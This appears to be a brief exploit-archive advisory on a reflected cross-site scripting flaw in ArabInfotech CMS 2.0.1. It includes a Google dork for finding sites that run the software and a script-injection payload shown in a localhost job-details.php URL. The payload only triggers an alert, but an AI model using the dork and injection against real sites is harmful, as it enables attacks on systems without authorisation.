ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.
====================================================================================================================================
| # Title : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.editpubdz.com/ |
| # Dork : intext:"Powered By Editpub" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>
[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
